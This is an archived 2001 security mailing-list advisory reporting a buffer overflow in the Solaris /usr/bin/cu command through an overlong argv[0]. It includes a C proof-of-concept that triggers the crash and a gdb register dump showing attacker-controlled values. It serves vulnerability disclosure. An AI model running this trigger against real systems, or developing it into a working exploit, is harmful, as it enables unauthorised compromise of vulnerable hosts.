OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pablo Sor (psorAFIP.GOV.AR)
Date: Wed Jan 17 2001 - 13:34:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Description

    The /usr/bin/cu command contains a buffer overflow, the problem occurs
    when
    it copy his own name ( argv[0] ) to an internal variable without
    checking
    out its lenght and this causes the overflow.

    Vulnerable Versions

    Sun Solaris 2.4
    Sun Solaris 2.5
    Sun Solaris 2.5.1
    Sun Solaris 2.6
    Sun Solaris 2.7

    (Dont know about Solaris 2.8)

    Technical Description

    #include <stdio.h>

    void main(int argc,char **argv)
    {
    char *buf;

    buf = (char *) malloc(atoi(argv[1])*sizeof(char));
    memset(buf,0x41,atoi(argv[1])-1);
    buf[atoi(argv[1])-1]=0;
    execl("/usr/bin/cu",buf,(char *)0);
    }

    $ uname -a
    SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5

    $ ./cu-demo 4000
    Segmentation Fault (core dumped)

    $ gdb ./cu-demo --core=core

    GNU gdb 4.17
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you
    are
    welcome to change it and/or distribute copies of it under certain
    conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for
    details.
    This GDB was configured as "sparc-sun-solaris2.5.1"...
    warning: core file may not match specified executable file.
    Core was generated by
    `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation Fault.
    #0 0xef62901c in ?? ()
    (gdb) info registers
    g0 0x0 0
    g1 0xef628d24 -278754012
    g2 0x0 0
    g3 0x0 0
    g4 0x0 0
    g5 0x0 0
    g6 0x0 0
    g7 0x0 0
    o0 0x137a4 79780
    o1 0xef792a88 -277271928
    o2 0x0 0
    o3 0x0 0
    o4 0x0 0
    o5 0xef792a88 -277271928
    sp 0xefffecb0 -268440400
    o7 0x31b48 203592
    l0 0x7efefeff 2130640639
    l1 0x81010100 -2130640640
    l2 0xff000000 -16777216
    l3 0xff0000 16711680
    l4 0xff00 65280
    l5 0x81010100 -2130640640
    l6 0x7 7
    l7 0xef7927d4 -277272620
    i0 0x39000 233472
    i1 0xeffffec4 -268435772
    i2 0x38088 229512
    i3 0x41414141 1094795585
    i4 0x2f 47
    i5 0x0 0
    fp 0xefffecf0 -268440336
    i7 0x137a4 79780
    y 0x0 0
    psr 0x4400086 71303302
    wim 0x0 0
    tbr 0x0 0
    pc 0xef62901c -278753252
    npc 0xef628ffc -278753284
    fpsr 0x0 0
    cpsr 0x0 0

    Pablo Sor
    psorafip.gov.ar